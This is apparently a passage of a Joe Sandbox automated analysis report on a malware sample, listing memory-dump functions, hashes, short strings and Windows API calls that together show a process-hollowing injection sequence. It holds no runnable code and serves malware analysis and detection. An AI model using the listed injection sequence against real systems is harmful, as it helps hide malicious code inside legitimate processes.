                                          • String ID: Tecq$Tecq
                                          • API String ID: 0-2088518435
                                          • Opcode ID: 9f4ac62edf670e0a1b7c387c086d6f5b24bef35e5420e49be2408fe6069249f2
                                          • Instruction ID: 76a0636108f94384b06c8336c25d9ecdc28ebce5c8de1c4920c4f5b475a95bd8
                                          • Opcode Fuzzy Hash: 9f4ac62edf670e0a1b7c387c086d6f5b24bef35e5420e49be2408fe6069249f2
                                          • Instruction Fuzzy Hash: CD81B2B4E052098FDB04CFAAC9856DEFBB2FF89310F24912AE419BB254D7305945CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 5 1l
                                          • API String ID: 0-1554365358
                                          • Opcode ID: d52bf59014432f1e6615f44f234bff2f89541101b3be2e00d3712542685a7544
                                          • Instruction ID: fe5e3719951dc72ad6b565fe243f407988786bea4b772d5ce8d259582c375119
                                          • Opcode Fuzzy Hash: d52bf59014432f1e6615f44f234bff2f89541101b3be2e00d3712542685a7544
                                          • Instruction Fuzzy Hash: 9FF11470E15219CFDB18CFA9D846ADDFBB6FB89300F10A46AE45AB7254EB309941CF14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 5 1l
                                          • API String ID: 0-1554365358
                                          • Opcode ID: da06f9848a0356887e0ccf5187b89e50a8398f865cede96d3dcdd651cf5ec1bb
                                          • Instruction ID: 609297cff4930c4a8a9db4b9516a87d9a2c1c615afdbecad8301fc0ce613e3b8
                                          • Opcode Fuzzy Hash: da06f9848a0356887e0ccf5187b89e50a8398f865cede96d3dcdd651cf5ec1bb
                                          • Instruction Fuzzy Hash: 39F11574E15219CFDB18CFA9D846A9DFBB6FB89300F10E46AE41AB7254EB309941CF14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 5 1l
                                          • API String ID: 0-1554365358
                                          • Opcode ID: 543387ad2e5ecfd90106b906b681cb0430159999f01207fcb045976f7db2ef38
                                          • Instruction ID: 8ba9cbcb008e2f3f1eac65a6545e06df62378f25d77993b6a49609707f8d9b3a
                                          • Opcode Fuzzy Hash: 543387ad2e5ecfd90106b906b681cb0430159999f01207fcb045976f7db2ef38
                                          • Instruction Fuzzy Hash: 5951E374E112188FDB54CFA9D946B9DFBB6FB88300F1094AAE44AB7254DB309E85CF14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 5 1l
                                          • API String ID: 0-1554365358
                                          • Opcode ID: 42fb4fda790f2e856e6c205de52bab57274a8a59d999a5a5f02f4353477e81ed
                                          • Instruction ID: 9e30290ac4ec78fd5ae89bdaff7d118df97567b93dad81a15893d23a0aa848a5
                                          • Opcode Fuzzy Hash: 42fb4fda790f2e856e6c205de52bab57274a8a59d999a5a5f02f4353477e81ed
                                          • Instruction Fuzzy Hash: C851E274E112188FDB54CFA9D946B9DFBB6FB88300F1094AAE40AB7254DB309E85CF10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 795439c6f2e05e1d53493b333cb371acef09ff1e6c1bc1f9ad2863fbe4b6170e
                                          • Instruction ID: 56787a9fc60146b2d2da2382287f82f0f84668198f533e02b8a990e974791a7e
                                          • Opcode Fuzzy Hash: 795439c6f2e05e1d53493b333cb371acef09ff1e6c1bc1f9ad2863fbe4b6170e
                                          • Instruction Fuzzy Hash: F6A116B0D15219DFDB18CFA6D98569EFBB2FF89340F20942AD41ABB254DB305906CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0767B69E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0767B69E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00E4B446
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2071067523.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e40000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 00E460C1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2071067523.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e40000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 00E460C1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2071067523.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e40000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0767B270
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0767B270
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E4D666,?,?,?,?,?), ref: 00E4D727
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2071067523.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e40000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0767B0C6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0767B350
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E4D666,?,?,?,?,?), ref: 00E4D727
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2071067523.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e40000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0767B350
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0767B0C6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00E4B446
                                            • Part of subcall function 00E4AC40: LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E4B4C1,00000800,00000000,00000000), ref: 00E4B6B2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2071067523.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e40000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: HandleLibraryLoadModule
                                          • String ID:
                                          • API String ID: 4133054770-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E4B4C1,00000800,00000000,00000000), ref: 00E4B6B2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2071067523.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e40000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0767B18E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0767B18E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E4B4C1,00000800,00000000,00000000), ref: 00E4B6B2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2071067523.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e40000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,0767D379,?,?), ref: 0767D520
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,0767D379,?,?), ref: 0767D520
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00E4B446
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2071067523.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e40000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0767C65D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0767C65D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (gq
                                          • API String ID: 0-1972435379
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Hgq
                                          • API String ID: 0-2103768809
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Hgq
                                          • API String ID: 0-2103768809
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 5 1l
                                          • API String ID: 0-1554365358
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ~552
                                          • API String ID: 0-3806510334
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4j
                                          • API String ID: 0-3078020137
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: B
                                          • API String ID: 0-1255198513
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: B
                                          • API String ID: 0-1255198513
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: m6
                                          • API String ID: 0-2040306782
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: m6
                                          • API String ID: 0-2040306782
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ~552
                                          • API String ID: 0-3806510334
                                          • Opcode ID: 7282758930d32927840676e9f7fb579bfa9d4993599a5a3e3a101cf966b6eedd
                                          • Instruction ID: 7006841c69e29e9fb92bdf307a579d1fd9d1b316a09d3cfe6d5c8d55a7e61d3c
                                          • Opcode Fuzzy Hash: 7282758930d32927840676e9f7fb579bfa9d4993599a5a3e3a101cf966b6eedd
                                          • Instruction Fuzzy Hash: 4611A074E01308EBD748CFA5D9459AEFBB6FF89200F20E4A6D44AA7214EB309A40CB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4j
                                          • API String ID: 0-3078020137
                                          • Opcode ID: 8b20fb31581b43f78a28464c7506ebb07342ab531c6cbc6061c38c2a657feab8
                                          • Instruction ID: 1f09c00ecde39c62584e07b081a9fd90215afa10871ddf74820b77f9733e9939
                                          • Opcode Fuzzy Hash: 8b20fb31581b43f78a28464c7506ebb07342ab531c6cbc6061c38c2a657feab8
                                          • Instruction Fuzzy Hash: EEF0AF70A1A308DFD704DFB8D54A19DBFB2AB88201F10E466F44993204EB309E04CA01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d53a1ab3ecff6222d9881d66372643014ebf3e9411ab14cef6a3028dee6cbf61
                                          • Instruction ID: 2713279672e48bb77b6e666f346fd3ddf824c69439f412ed4af7f5b014fde415
                                          • Opcode Fuzzy Hash: d53a1ab3ecff6222d9881d66372643014ebf3e9411ab14cef6a3028dee6cbf61
                                          • Instruction Fuzzy Hash: E962FFB0E00B455AEB709F74844D7AEBAA1FB46304F20691FC1FACB7A0DB359881CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7c0bad3823b8675a1bc18e536a7ccfb369f5866649c5184de53417b6be3a2dcf
                                          • Instruction ID: 7c1e18727b85318f6c21e3f6c0d9d3dbe1b138c363f974d4fd8f7c01b9b484b6
                                          • Opcode Fuzzy Hash: 7c0bad3823b8675a1bc18e536a7ccfb369f5866649c5184de53417b6be3a2dcf
                                          • Instruction Fuzzy Hash: 3C1238B0E05B429AE7745F74858D39EB690FB06318F30591FC0FA8B365D7369486CB8A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b5dca5d49f099c3ab49423bfa7d775ca53037db51ce50813513533c8295c48ec
                                          • Instruction ID: cd96c13aaee55247c268c8fadf101ca31d3f9d63b330608ac3608e824be0fcb4
                                          • Opcode Fuzzy Hash: b5dca5d49f099c3ab49423bfa7d775ca53037db51ce50813513533c8295c48ec
                                          • Instruction Fuzzy Hash: 6F51D030A00306CFCB15EFA8D4996BEBBB2EF85300F149529E586E7351DF349A46CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 66d4464565b50af0a9c744d3afd50aa214aa29459de3588990820234e7fb0b38
                                          • Instruction ID: 9154953f5cc1fd6863149e85cb38e6a46c48ed6559243facee25e0afc7806c42
                                          • Opcode Fuzzy Hash: 66d4464565b50af0a9c744d3afd50aa214aa29459de3588990820234e7fb0b38
                                          • Instruction Fuzzy Hash: C3719078A01208AFDB14DF59D889DAEBBB2FF48714F115098F941AB361DB31EC81CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80e939d7c91491c78a9bc933fda57df9361e343cc8052fb3ac3ff59c129162e1
                                          • Instruction ID: 339cbe91a7d9bb2533a72c8cdbb1d390c9f58ba1b31928b6aeb571018893e149
                                          • Opcode Fuzzy Hash: 80e939d7c91491c78a9bc933fda57df9361e343cc8052fb3ac3ff59c129162e1
                                          • Instruction Fuzzy Hash: 45519A707006049FDB15EF28C89ABAAB7F6EF89304F145469E48ADB3A1DB71EC41CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fd519af6e23c2759a5321c379ce57f7ed4cfe142e16e815177dc076cbe98805d
